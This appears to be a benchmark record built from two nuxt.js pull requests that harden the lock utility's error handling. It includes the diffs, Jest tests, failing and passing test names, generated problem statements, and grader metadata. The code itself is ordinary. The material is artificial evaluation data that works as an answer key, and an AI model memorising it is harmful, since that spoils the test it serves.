[packages/cli/src/commands/start.js](https://codecov.io/gh/nuxt/nuxt.js/pull/5347/diff?src=pr&el=tree#diff-cGFja2FnZXMvY2xpL3NyYy9jb21tYW5kcy9zdGFydC5qcw==) | `0% <0%> (-100%)` | :arrow_down: | | [packages/cli/src/commands/generate.js](https://codecov.io/gh/nuxt/nuxt.js/pull/5347/diff?src=pr&el=tree#diff-cGFja2FnZXMvY2xpL3NyYy9jb21tYW5kcy9nZW5lcmF0ZS5qcw==) | `0% <0%> (-100%)` | :arrow_down: | | [packages/cli/src/options/common.js](https://codecov.io/gh/nuxt/nuxt.js/pull/5347/diff?src=pr&el=tree#diff-cGFja2FnZXMvY2xpL3NyYy9vcHRpb25zL2NvbW1vbi5qcw==) | `0% <0%> (-100%)` | :arrow_down: | | [packages/cli/src/utils/constants.js](https://codecov.io/gh/nuxt/nuxt.js/pull/5347/diff?src=pr&el=tree#diff-cGFja2FnZXMvY2xpL3NyYy91dGlscy9jb25zdGFudHMuanM=) | `0% <0%> (-100%)` | :arrow_down: | | ... and [40 more](https://codecov.io/gh/nuxt/nuxt.js/pull/5347/diff?src=pr&el=tree-more) | | ------ [Continue to review full report at Codecov](https://codecov.io/gh/nuxt/nuxt.js/pull/5347?src=pr&el=continue). > **Legend** - [Click here to learn more](https://docs.codecov.io/docs/codecov-delta) > `Δ = absolute <relative> (impact)`, `ø = not affected`, `? = missing data` > Powered by [Codecov](https://codecov.io/gh/nuxt/nuxt.js/pull/5347?src=pr&el=footer). Last update [3c50876...c713b3f](https://codecov.io/gh/nuxt/nuxt.js/pull/5347?src=pr&el=lastupdated). Read the [comment docs](https://docs.codecov.io/docs/pull-request-comments).
nuxt__nuxt.js-5347
diff --git a/packages/utils/src/locking.js b/packages/utils/src/locking.js index d0ee5f0f0..c9b7fc15b 100644 --- a/packages/utils/src/locking.js +++ b/packages/utils/src/locking.js @@ -35,16 +35,33 @@ export async function getLockPath(config) { export async function lock({ id, dir, root, options }) { const lockPath = await getLockPath({ id, dir, root }) - const locked = await properlock.check(lockPath) - if (locked) { - consola.fatal(`A lock with id '${id}' already exists on ${dir}`) + try { + const locked = await properlock.check(lockPath) + if (locked) { + consola.fatal(`A lock with id '${id}' already exists on ${dir}`) + } + } catch (e) { + consola.debug(`Check for an existing lock with id '${id}' on ${dir} failed`, e) } - options = getLockOptions(options) - const release = await properlock.lock(lockPath, options) + let lockWasCompromised = false + let release + + try { + options = getLockOptions(options) + + const onCompromised = options.onCompromised + options.onCompromised = (err) => { + onCompromised(err) + lockWasCompromised = true + } + + release = await properlock.lock(lockPath, options) + } catch (e) {} if (!release) { consola.warn(`Unable to get a lock with id '${id}' on ${dir} (but will continue)`) + return false } if (!lockPaths.size) { @@ -59,8 +76,27 @@ export async function lock({ id, dir, root, options }) { lockPaths.add(lockPath) return async function lockRelease() { - await release() - await fs.remove(lockPath) - lockPaths.delete(lockPath) + try { + await fs.remove(lockPath) + lockPaths.delete(lockPath) + + // release as last so the lockPath is still removed + // when it fails on a compromised lock + await release() + } catch (e) { + if (!lockWasCompromised || !e.message.includes('already released')) { + consola.debug(e) + return + } + + // proper-lockfile doesnt remove lockDir when lock is compromised + // removing it here could cause the 'other' process to throw an error + // as well, but in our case its much more likely the lock was + // compromised due to mtime update timeouts + const lockDir = `${lockPath}.lock` + if (await fs.exists(lockDir)) { + await fs.remove(lockDir) + } + } } }
fix(cli): catch all possible errors thrown from proper-filelock <!--- Provide a general summary of your changes in the title above --> ![image](https://user-images.githubusercontent.com/1067403/54847600-111c5c00-4cdf-11e9-87c3-d473bda3c054.png) ## Types of changes <!--- What types of changes does your code introduce? Put an `x` in all the boxes that apply: --> - [x] Bug fix (a non-breaking change which fixes an issue) - [ ] New feature (a non-breaking change which adds functionality) - [ ] Breaking change (fix or feature that would cause existing functionality to change) ## Description <!--- Describe your changes in detail --> <!--- Why is this change required? What problem does it solve? --> <!--- If it resolves an open issue, please link to the issue here. For example "Resolves: #1337" --> Ref: #5324 Although I could have expected it maybe, its not really documented that proper-lockfile also throws errors when it cant release a lock. This pr should fix that behaviour by wrapping any code which originates from proper-lockfile in a `try/catch` and warn when an error was thrown. The _only_ time a lock should result in a `Nuxt Fatal Error` is when a lock with the same id already exists. ## Checklist: <!--- Put an `x` in all the boxes that apply. --> <!--- If your change requires a documentation PR, please link it appropriately --> <!--- If you're unsure about any of these, don't hesitate to ask. We're here to help! --> - [ ] My change requires a change to the documentation. - [ ] I have updated the documentation accordingly. (PR: #) - [x] I have added tests to cover my changes (if not applicable, please state why) - [ ] All new and existing tests are passing.
**Title** Robust handling of lock‑related errors in the utils locking module **Problem** The locking utility relied on a third‑party lock library that can throw exceptions during lock checks, acquisition, and release. These uncaught errors caused the CLI to terminate unexpectedly, even when the lock situation was recoverable. **Root Cause** Exceptions from the external lock library were not intercepted, and compromised lock states were not cleaned up, leading to fatal failures and stale lock artifacts. **Fix / Expected Behavior** - Guard all interactions with the lock library in defensive error handling. - Log unexpected errors at a debug level instead of crashing the process. - Treat only the case of an existing lock with the same identifier as a fatal error. - Gracefully fail when a lock cannot be obtained, emitting a warning and allowing execution to continue. - Ensure lock release removes lock files and cleans up compromised lock directories without propagating errors. **Risk & Validation** - Verify that normal lock acquisition and release continue to work unchanged. - Confirm that duplicate‑lock scenarios still abort with a clear fatal message. - Run the existing test suite and add tests covering error paths to ensure no regressions.
5,347
nuxt/nuxt.js
diff --git a/packages/utils/test/locking.test.js b/packages/utils/test/locking.test.js index 225c64157..52acfd6dd 100644 --- a/packages/utils/test/locking.test.js +++ b/packages/utils/test/locking.test.js @@ -61,7 +61,7 @@ describe('util: locking', () => { }) test('lock creates a lock and returns a release fn', async () => { - properlock.lock.mockImplementationOnce(() => true) + properlock.lock.mockReturnValue(true) const fn = await lock(lockConfig) @@ -75,7 +75,7 @@ describe('util: locking', () => { }) test('lock throws error when lock already exists', async () => { - properlock.check.mockImplementationOnce(() => true) + properlock.check.mockReturnValue(true) await lock(lockConfig) expect(properlock.check).toHaveBeenCalledTimes(1) @@ -84,7 +84,19 @@ describe('util: locking', () => { }) test('lock logs warning when it couldnt get a lock', async () => { - properlock.lock.mockImplementationOnce(() => false) + properlock.lock.mockReturnValue(false) + + const fn = await lock(lockConfig) + expect(fn).toBe(false) + expect(properlock.lock).toHaveBeenCalledTimes(1) + expect(consola.warn).toHaveBeenCalledTimes(1) + expect(consola.warn).toHaveBeenCalledWith(`Unable to get a lock with id '${lockConfig.id}' on ${lockConfig.dir} (but will continue)`) + }) + + test('lock logs warning when proper.lock threw error', async () => { + properlock.lock.mockImplementation(() => { + throw new Error('test error') + }) await lock(lockConfig) expect(properlock.lock).toHaveBeenCalledTimes(1) @@ -94,7 +106,7 @@ describe('util: locking', () => { test('lock returns a release method for unlocking both lockfile as lockPath', async () => { const release = jest.fn() - properlock.lock.mockImplementationOnce(() => release) + properlock.lock.mockImplementation(() => release) const fn = await lock(lockConfig) await fn() @@ -105,7 +117,7 @@ describe('util: locking', () => { test('lock release also cleansup onExit set', async () => { const release = jest.fn() - properlock.lock.mockImplementationOnce(() => release) + properlock.lock.mockImplementation(() => release) const fn = await lock(lockConfig) expect(lockPaths.size).toBe(1) @@ -114,8 +126,58 @@ describe('util: locking', () => { expect(lockPaths.size).toBe(0) }) + test('lock release only logs error when error thrown', async () => { + const release = jest.fn(() => { + throw new Error('test error') + }) + properlock.lock.mockImplementation(() => release) + + const fn = await lock(lockConfig) + await expect(fn()).resolves.not.toThrow() + + expect(consola.debug).toHaveBeenCalledTimes(1) + }) + + test('lock check only logs error when error thrown', async () => { + const testError = new Error('check error') + properlock.lock.mockImplementation(() => () => {}) + properlock.check.mockImplementation(() => { + throw testError + }) + + const fn = await lock(lockConfig) + expect(fn).toEqual(expect.any(Function)) + + expect(consola.debug).toHaveBeenCalledTimes(1) + expect(consola.debug).toHaveBeenCalledWith(`Check for an existing lock with id '${lockConfig.id}' on ${lockConfig.dir} failed`, testError) + }) + + test('lock release doesnt log error when error thrown because lock compromised', async () => { + fs.exists.mockReturnValue(true) + const testError = new Error('Lock is already released') + const release = jest.fn(() => { + throw testError + }) + + properlock.lock.mockImplementation((path, options) => { + options.onCompromised() + return release + }) + + const fn = await lock({ + ...lockConfig, + options: { + // overwrite default compromised which calls consola.warn + onCompromised() {} + } + }) + + await expect(fn()).resolves.not.toThrow() + expect(consola.warn).not.toHaveBeenCalled() + }) + test('lock sets exit listener once to remove lockPaths', async () => { - properlock.lock.mockImplementationOnce(() => true) + properlock.lock.mockReturnValue(true) await lock(lockConfig) await lock(lockConfig) @@ -124,8 +186,10 @@ describe('util: locking', () => { }) test('exit listener removes all lockPaths when called', async () => { + properlock.lock.mockReturnValue(true) + let callback - onExit.mockImplementationOnce(cb => (callback = cb)) + onExit.mockImplementation(cb => (callback = cb)) const lockConfig2 = Object.assign({}, lockConfig, { id: 'id2' }) @@ -145,7 +209,7 @@ describe('util: locking', () => { }) test('lock uses setLockOptions to set defaults', async () => { - const spy = properlock.lock.mockImplementationOnce(() => true) + const spy = properlock.lock.mockReturnValue(true) await lock(lockConfig)
[ "lock logs warning when it couldnt get a lock", "lock logs warning when proper.lock threw error", "lock release only logs error when error thrown", "lock check only logs error when error thrown", "lock release doesnt log error when error thrown because lock compromised" ]
[ "should export Builder", "should get context with req and res", "should get correct globals", "should export Server and Listener", "should construct context", "should export getDefaultNuxtConfig and getNuxtConfig", "should return false in default shouldPrefetch", "should return true in script/style shouldPreload", "should return false in other shouldPreload", "should return globals with given globalName", "should list all commands", "should check if given argument is string", "should check if given argument is empty string", "should check if given argument is pure object", "should check if given argument is url", "should wrap given argument with array", "should strip white spaces in given argument", "should encode html", "should join url", "should export Module, Nuxt and Resolver", "should export Generator", "should return server configurations with NUXT_* env", "should return server configurations with env", "should return server configurations with npm_* env", "should construct listener", "should listen http host and port", "should listen https host and port", "should listen unix socket host and port", "should prevent listening multiple times", "should throw error if error occurred or listen failed", "should compute http url", "should compute https url", "should compute unix socket url", "should throw error in serverErrorHandler", "should throw address in use error", "should throw address in use error for socket", "should fallback to a random port in address in use error", "should close server", "should prevent destroying server if server is not listening", "should return builder plugins context", "should return builder build options", "should import relative module", "should import core module", "should print error when module not found", "should throw error when error is not module not found", "should serialize normal function", "should serialize shorthand function", "should serialize arrow function", "should not replace custom scripts", "should serialize internal function", "should check if path starts with alias", "should check if path starts with root alias", "should check if path starts with src alias", "should return same path in linux", "should define alias", "should check if given argument is index file or folder", "should return main module", "should resolve alias path", "should keep webpack inline loaders prepended", "should check path which is not started with alias", "should return default nuxt configurations", "should return nuxt configurations with custom env", "should construct Ignore", "should add ignore file", "should find ignore file", "should only find existed ignore file", "should filter ignore files", "should return origin paths if there is no ignorefile", "should reload ignore", "should call fn in sequence", "should call fn in parallel", "chainFn (mutate, mutate)", "chainFn (mutate, return)", "chainFn (return, mutate)", "chainFn (return, return)", "chainFn (return, non-function)", "chainFn (non-function, return)", "should return error middleware", "should send html error response", "should send json error response", "should send html error response by youch in debug mode", "should send json error response by youch in debug mode", "should search all possible paths when read source", "should return source content after read source", "should return relative fileName if fileName is absolute path", "should ignore error when reading source", "should return if fileName is unknown when read source", "should return modern middleware", "should not detect modern build if modern mode is specified", "should detect client modern build and display message", "should detect server modern build and display message", "should not detect modern browser if modern build is not found", "should not detect modern browser if connect has been detected", "should detect modern browser based on user-agent", "should detect legacy browser based on user-agent", "should ignore illegal user-agent", "should flat route with path", "should ignore route with * and :", "should resolve route with /", "should guard parent dir", "should guard same dir", "should not guard same level dir", "should not guard same level dir - 2", "should not guard child dir", "should promisify array routes", "should promisify functional routes", "should promisify promisable functional routes", "should promisify promisable functional routes with arguments", "should promisify functional routes with error", "should promisify functional routes with arguments and error", "should promisify functional routes with result", "should promisify functional routes with arguments and result", "createRoutes should allow snake case routes in posix system", "timeout (promise)", "timeout (async function)", "timeout (timeout in 100ms)", "timeout (async timeout in 100ms)", "waitFor", "should construct Timer", "should create new time record", "should stop and remove time record", "should be quiet if end with nonexistent time", "should use bigint hrtime if supports", "should calculate duration with bigint hrtime", "should use hrtime if bigint it not supported", "should calculate duration with hrtime", "should clear all times", "should return dev filenames", "should return prod filenames", "should return modern filenames", "should export all methods from utils folder", "onCompromised lock warns on compromise by default", "can override default options", "createLockPath creates the same lockPath for identical locks", "createLockPath creates unique lockPaths for different ids", "createLockPath creates unique lockPaths for different dirs", "createLockPath creates unique lockPaths for different roots", "getLockPath creates lockPath when it doesnt exists", "lock creates a lock and returns a release fn", "lock throws error when lock already exists", "lock returns a release method for unlocking both lockfile as lockPath", "lock release also cleansup onExit set", "lock sets exit listener once to remove lockPaths", "exit listener removes all lockPaths when called", "lock uses setLockOptions to set defaults" ]
Function: lock({ id, dir, root, options }) Location: packages/utils/src/locking.js Inputs: An object `config` containing - `id` (string): identifier for the lock, - `dir` (string): directory where the lock file should be placed, - optional `root` (string) and `options` (object) passed to **proper‑lockfile**. Outputs: Returns a `Promise` that resolves to - `false` when the lock cannot be obtained, or - an **async release function** that removes the lock file/directory and releases the lock. All errors thrown by `proper‑lockfile` (`check` or `lock`) are caught; duplicate‑lock cases trigger `consola.fatal`, other errors are logged via `consola.debug` (or `consola.warn` for acquire failures). The release function also catches errors, logs them with `consola.debug`, and cleans up compromised lock directories when appropriate. Description: Acquires a filesystem lock using `proper‑lockfile`, handling all possible error paths, and provides a safe release callback. Use it when you need mutually‑exclusive access to a resource and want robust error handling without uncaught exceptions.
MIT
{ "base_image_name": "node_16", "install": [ "sed -i '/\"packageManager\":/d' package.json", "npm install --prefer-offline --no-audit --progress=false --ignore-scripts --legacy-peer-deps", "npx lerna link", "npx jiti ./scripts/pkg.js" ], "log_parser": "parse_log_js_4", "test_cmd": "npx jest --forceExit --verbose --silent --passWithNoTests packages/" }
{ "num_modified_files": 1, "num_modified_lines": 44, "pr_author": "pimlie", "pr_labels": [], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.87, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [], "intent_completeness": "complete", "patch": null, "pr_categories": [ "minor_bug" ], "reason": null, "reasoning": "The issue asks to wrap all proper‑lockfile calls in try/catch so that errors are caught and a warning is logged, with only duplicate lock ids causing a fatal error. The provided test patch asserts exactly this behavior, checking warning logs for lock acquisition failures, debug logs for errors during check and release, and proper handling of compromised locks. No test assertions rely on unrelated modules, external URLs, or undocumented naming conventions, and the specification covers the required outcomes. Therefore the task is well‑specified and the tests align, resulting in a clean solvable classification.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
3c50876d737ced86f2e3677c1ee7be6328dcdcc9
2019-03-22 22:52:21
codecov-io: # [Codecov](https://codecov.io/gh/nuxt/nuxt.js/pull/5349?src=pr&el=h1) Report > Merging [#5349](https://codecov.io/gh/nuxt/nuxt.js/pull/5349?src=pr&el=desc) into [dev](https://codecov.io/gh/nuxt/nuxt.js/commit/3c50876d737ced86f2e3677c1ee7be6328dcdcc9?src=pr&el=desc) will **not change** coverage. > The diff coverage is `n/a`. [![Impacted file tree graph](https://codecov.io/gh/nuxt/nuxt.js/pull/5349/graphs/tree.svg?width=650&token=nGD1PtMB3M&height=150&src=pr)](https://codecov.io/gh/nuxt/nuxt.js/pull/5349?src=pr&el=tree) ```diff @@ Coverage Diff @@ ## dev #5349 +/- ## ======================================= Coverage 95.66% 95.66% ======================================= Files 74 74 Lines 2513 2513 Branches 639 639 ======================================= Hits 2404 2404 Misses 92 92 Partials 17 17 ``` ------ [Continue to review full report at Codecov](https://codecov.io/gh/nuxt/nuxt.js/pull/5349?src=pr&el=continue). > **Legend** - [Click here to learn more](https://docs.codecov.io/docs/codecov-delta) > `Δ = absolute <relative> (impact)`, `ø = not affected`, `? = missing data` > Powered by [Codecov](https://codecov.io/gh/nuxt/nuxt.js/pull/5349?src=pr&el=footer). Last update [3c50876...01b1cb2](https://codecov.io/gh/nuxt/nuxt.js/pull/5349?src=pr&el=lastupdated). Read the [comment docs](https://docs.codecov.io/docs/pull-request-comments).
nuxt__nuxt.js-5349
diff --git a/examples/with-element-ui/package.json b/examples/with-element-ui/package.json index 6e1108f59..6dd5c6c8c 100644 --- a/examples/with-element-ui/package.json +++ b/examples/with-element-ui/package.json @@ -3,14 +3,14 @@ "version": "1.0.0", "license": "MIT", "dependencies": { - "element-ui": "^2", - "nuxt": "latest", - "post-update": "yarn upgrade --latest" + "element-ui": "^2.6.3", + "nuxt": "latest" }, "scripts": { "dev": "nuxt", "build": "nuxt build", - "start": "nuxt start" + "start": "nuxt start", + "post-update": "yarn upgrade --latest" }, "devDependencies": { "node-sass": "^4.6.0", diff --git a/packages/builder/src/builder.js b/packages/builder/src/builder.js index e4ebf4d3a..ec6956abd 100644 --- a/packages/builder/src/builder.js +++ b/packages/builder/src/builder.js @@ -222,7 +222,7 @@ export default class Builder { 'Using npm:\n', `npm i ${dependencyFixes.join(' ')}\n` ) - throw new Error('Missing Template Dependencies') + throw new Error('Missing App Dependencies') } } diff --git a/packages/utils/src/locking.js b/packages/utils/src/locking.js index d0ee5f0f0..c9b7fc15b 100644 --- a/packages/utils/src/locking.js +++ b/packages/utils/src/locking.js @@ -35,16 +35,33 @@ export async function getLockPath(config) { export async function lock({ id, dir, root, options }) { const lockPath = await getLockPath({ id, dir, root }) - const locked = await properlock.check(lockPath) - if (locked) { - consola.fatal(`A lock with id '${id}' already exists on ${dir}`) + try { + const locked = await properlock.check(lockPath) + if (locked) { + consola.fatal(`A lock with id '${id}' already exists on ${dir}`) + } + } catch (e) { + consola.debug(`Check for an existing lock with id '${id}' on ${dir} failed`, e) } - options = getLockOptions(options) - const release = await properlock.lock(lockPath, options) + let lockWasCompromised = false + let release + + try { + options = getLockOptions(options) + + const onCompromised = options.onCompromised + options.onCompromised = (err) => { + onCompromised(err) + lockWasCompromised = true + } + + release = await properlock.lock(lockPath, options) + } catch (e) {} if (!release) { consola.warn(`Unable to get a lock with id '${id}' on ${dir} (but will continue)`) + return false } if (!lockPaths.size) { @@ -59,8 +76,27 @@ export async function lock({ id, dir, root, options }) { lockPaths.add(lockPath) return async function lockRelease() { - await release() - await fs.remove(lockPath) - lockPaths.delete(lockPath) + try { + await fs.remove(lockPath) + lockPaths.delete(lockPath) + + // release as last so the lockPath is still removed + // when it fails on a compromised lock + await release() + } catch (e) { + if (!lockWasCompromised || !e.message.includes('already released')) { + consola.debug(e) + return + } + + // proper-lockfile doesnt remove lockDir when lock is compromised + // removing it here could cause the 'other' process to throw an error + // as well, but in our case its much more likely the lock was + // compromised due to mtime update timeouts + const lockDir = `${lockPath}.lock` + if (await fs.exists(lockDir)) { + await fs.remove(lockDir) + } + } } } diff --git a/packages/vue-app/package.json b/packages/vue-app/package.json index 4bb821abb..ae8b26aa0 100644 --- a/packages/vue-app/package.json +++ b/packages/vue-app/package.json @@ -12,6 +12,7 @@ "main": "dist/vue-app.js", "typings": "types/index.d.ts", "dependencies": { + "core-js": "^2.6.5", "node-fetch": "^2.3.0", "unfetch": "^4.1.0", "vue": "^2.6.10",
examples(with-element-ui): fix package scripts
**Title** Improve example configuration, error messaging, locking reliability, and polyfill support **Problem** * The Element UI example had an incorrectly placed script and an overly broad version range, leading to broken npm/yarn commands. * Builder emitted a misleading error label, confusing developers about the missing dependencies. * The locking utility could fail silently or leave stale lock artefacts, risking race conditions. * The Vue‑App package missed a core‑js polyfill, causing runtime failures in certain environments. **Root Cause** * Misconfiguration of package scripts and dependency versioning. * Inexact error wording and insufficient handling of lockfile errors. * Omitted polyfill dependency. **Fix / Expected Behavior** - Relocate the post‑update command to the proper script section and constrain the UI library version. - Update the builder’s error message to accurately describe missing application dependencies. - Reinforce the lock mechanism: catch check errors, detect compromised locks, ensure lock files are cleaned up, and return a clear failure indicator. - Add the core‑js package to the Vue‑App dependencies for required polyfills. **Risk & Validation** - Verify the example builds and starts correctly with the new script layout. - Run the builder on a project with missing dependencies to confirm the revised error message appears. - Execute concurrent lock operations to ensure no stale locks remain and that compromised locks are handled gracefully. - Run the Vue‑App in environments requiring polyfills to confirm the added core‑js resolves previous runtime errors.
5,349
nuxt/nuxt.js
diff --git a/packages/builder/test/builder.build.test.js b/packages/builder/test/builder.build.test.js index 8c16aea08..9274ee73f 100644 --- a/packages/builder/test/builder.build.test.js +++ b/packages/builder/test/builder.build.test.js @@ -263,7 +263,7 @@ describe('builder: builder build', () => { .mockReturnValueOnce({ version: 'alpha' }) .mockReturnValueOnce(undefined) - expect(() => builder.validateTemplate()).toThrow('Missing Template Dependencies') + expect(() => builder.validateTemplate()).toThrow('Missing App Dependencies') expect(nuxt.resolver.requireModule).toBeCalledTimes(2) expect(nuxt.resolver.requireModule).nthCalledWith(1, 'join(vue, package.json)') diff --git a/packages/utils/test/locking.test.js b/packages/utils/test/locking.test.js index 225c64157..52acfd6dd 100644 --- a/packages/utils/test/locking.test.js +++ b/packages/utils/test/locking.test.js @@ -61,7 +61,7 @@ describe('util: locking', () => { }) test('lock creates a lock and returns a release fn', async () => { - properlock.lock.mockImplementationOnce(() => true) + properlock.lock.mockReturnValue(true) const fn = await lock(lockConfig) @@ -75,7 +75,7 @@ describe('util: locking', () => { }) test('lock throws error when lock already exists', async () => { - properlock.check.mockImplementationOnce(() => true) + properlock.check.mockReturnValue(true) await lock(lockConfig) expect(properlock.check).toHaveBeenCalledTimes(1) @@ -84,7 +84,19 @@ describe('util: locking', () => { }) test('lock logs warning when it couldnt get a lock', async () => { - properlock.lock.mockImplementationOnce(() => false) + properlock.lock.mockReturnValue(false) + + const fn = await lock(lockConfig) + expect(fn).toBe(false) + expect(properlock.lock).toHaveBeenCalledTimes(1) + expect(consola.warn).toHaveBeenCalledTimes(1) + expect(consola.warn).toHaveBeenCalledWith(`Unable to get a lock with id '${lockConfig.id}' on ${lockConfig.dir} (but will continue)`) + }) + + test('lock logs warning when proper.lock threw error', async () => { + properlock.lock.mockImplementation(() => { + throw new Error('test error') + }) await lock(lockConfig) expect(properlock.lock).toHaveBeenCalledTimes(1) @@ -94,7 +106,7 @@ describe('util: locking', () => { test('lock returns a release method for unlocking both lockfile as lockPath', async () => { const release = jest.fn() - properlock.lock.mockImplementationOnce(() => release) + properlock.lock.mockImplementation(() => release) const fn = await lock(lockConfig) await fn() @@ -105,7 +117,7 @@ describe('util: locking', () => { test('lock release also cleansup onExit set', async () => { const release = jest.fn() - properlock.lock.mockImplementationOnce(() => release) + properlock.lock.mockImplementation(() => release) const fn = await lock(lockConfig) expect(lockPaths.size).toBe(1) @@ -114,8 +126,58 @@ describe('util: locking', () => { expect(lockPaths.size).toBe(0) }) + test('lock release only logs error when error thrown', async () => { + const release = jest.fn(() => { + throw new Error('test error') + }) + properlock.lock.mockImplementation(() => release) + + const fn = await lock(lockConfig) + await expect(fn()).resolves.not.toThrow() + + expect(consola.debug).toHaveBeenCalledTimes(1) + }) + + test('lock check only logs error when error thrown', async () => { + const testError = new Error('check error') + properlock.lock.mockImplementation(() => () => {}) + properlock.check.mockImplementation(() => { + throw testError + }) + + const fn = await lock(lockConfig) + expect(fn).toEqual(expect.any(Function)) + + expect(consola.debug).toHaveBeenCalledTimes(1) + expect(consola.debug).toHaveBeenCalledWith(`Check for an existing lock with id '${lockConfig.id}' on ${lockConfig.dir} failed`, testError) + }) + + test('lock release doesnt log error when error thrown because lock compromised', async () => { + fs.exists.mockReturnValue(true) + const testError = new Error('Lock is already released') + const release = jest.fn(() => { + throw testError + }) + + properlock.lock.mockImplementation((path, options) => { + options.onCompromised() + return release + }) + + const fn = await lock({ + ...lockConfig, + options: { + // overwrite default compromised which calls consola.warn + onCompromised() {} + } + }) + + await expect(fn()).resolves.not.toThrow() + expect(consola.warn).not.toHaveBeenCalled() + }) + test('lock sets exit listener once to remove lockPaths', async () => { - properlock.lock.mockImplementationOnce(() => true) + properlock.lock.mockReturnValue(true) await lock(lockConfig) await lock(lockConfig) @@ -124,8 +186,10 @@ describe('util: locking', () => { }) test('exit listener removes all lockPaths when called', async () => { + properlock.lock.mockReturnValue(true) + let callback - onExit.mockImplementationOnce(cb => (callback = cb)) + onExit.mockImplementation(cb => (callback = cb)) const lockConfig2 = Object.assign({}, lockConfig, { id: 'id2' }) @@ -145,7 +209,7 @@ describe('util: locking', () => { }) test('lock uses setLockOptions to set defaults', async () => { - const spy = properlock.lock.mockImplementationOnce(() => true) + const spy = properlock.lock.mockReturnValue(true) await lock(lockConfig)
[ "lock logs warning when it couldnt get a lock", "lock logs warning when proper.lock threw error", "lock release only logs error when error thrown", "lock check only logs error when error thrown", "lock release doesnt log error when error thrown because lock compromised" ]
[ "should export getDefaultNuxtConfig and getNuxtConfig", "should return server configurations with NUXT_* env", "should return server configurations with env", "should return server configurations with npm_* env", "should export Builder", "should check if path starts with alias", "should check if path starts with root alias", "should check if path starts with src alias", "should return same path in linux", "should define alias", "should check if given argument is index file or folder", "should return main module", "should resolve alias path", "should keep webpack inline loaders prepended", "should check path which is not started with alias", "should return default nuxt configurations", "should return nuxt configurations with custom env", "should export Server and Listener", "should construct Ignore", "should add ignore file", "should find ignore file", "should only find existed ignore file", "should filter ignore files", "should return origin paths if there is no ignorefile", "should reload ignore", "should return dev filenames", "should return prod filenames", "should return modern filenames", "should construct context", "should check if given argument is string", "should check if given argument is empty string", "should check if given argument is pure object", "should check if given argument is url", "should wrap given argument with array", "should strip white spaces in given argument", "should encode html", "should join url", "should export Module, Nuxt and Resolver", "should return false in default shouldPrefetch", "should return true in script/style shouldPreload", "should return false in other shouldPreload", "should return globals with given globalName", "should return error middleware", "should send html error response", "should send json error response", "should send html error response by youch in debug mode", "should send json error response by youch in debug mode", "should search all possible paths when read source", "should return source content after read source", "should return relative fileName if fileName is absolute path", "should ignore error when reading source", "should return if fileName is unknown when read source", "should return modern middleware", "should not detect modern build if modern mode is specified", "should detect client modern build and display message", "should detect server modern build and display message", "should not detect modern browser if modern build is not found", "should not detect modern browser if connect has been detected", "should detect modern browser based on user-agent", "should detect legacy browser based on user-agent", "should ignore illegal user-agent", "should return builder plugins context", "should return builder build options", "should get context with req and res", "should get correct globals", "timeout (promise)", "timeout (async function)", "timeout (timeout in 100ms)", "timeout (async timeout in 100ms)", "waitFor", "should construct Timer", "should create new time record", "should stop and remove time record", "should be quiet if end with nonexistent time", "should use bigint hrtime if supports", "should calculate duration with bigint hrtime", "should use hrtime if bigint it not supported", "should calculate duration with hrtime", "should clear all times", "should flat route with path", "should ignore route with * and :", "should resolve route with /", "should guard parent dir", "should guard same dir", "should not guard same level dir", "should not guard same level dir - 2", "should not guard child dir", "should promisify array routes", "should promisify functional routes", "should promisify promisable functional routes", "should promisify promisable functional routes with arguments", "should promisify functional routes with error", "should promisify functional routes with arguments and error", "should promisify functional routes with result", "should promisify functional routes with arguments and result", "createRoutes should allow snake case routes in posix system", "should export Generator", "should call fn in sequence", "should call fn in parallel", "chainFn (mutate, mutate)", "chainFn (mutate, return)", "chainFn (return, mutate)", "chainFn (return, return)", "chainFn (return, non-function)", "chainFn (non-function, return)", "should serialize normal function", "should serialize shorthand function", "should serialize arrow function", "should not replace custom scripts", "should serialize internal function", "should list all commands", "should import relative module", "should import core module", "should print error when module not found", "should throw error when error is not module not found", "should construct listener", "should listen http host and port", "should listen https host and port", "should listen unix socket host and port", "should prevent listening multiple times", "should throw error if error occurred or listen failed", "should compute http url", "should compute https url", "should compute unix socket url", "should throw error in serverErrorHandler", "should throw address in use error", "should throw address in use error for socket", "should fallback to a random port in address in use error", "should close server", "should prevent destroying server if server is not listening", "should export all methods from utils folder", "onCompromised lock warns on compromise by default", "can override default options", "createLockPath creates the same lockPath for identical locks", "createLockPath creates unique lockPaths for different ids", "createLockPath creates unique lockPaths for different dirs", "createLockPath creates unique lockPaths for different roots", "getLockPath creates lockPath when it doesnt exists", "lock creates a lock and returns a release fn", "lock throws error when lock already exists", "lock returns a release method for unlocking both lockfile as lockPath", "lock release also cleansup onExit set", "lock sets exit listener once to remove lockPaths", "exit listener removes all lockPaths when called", "lock uses setLockOptions to set defaults" ]
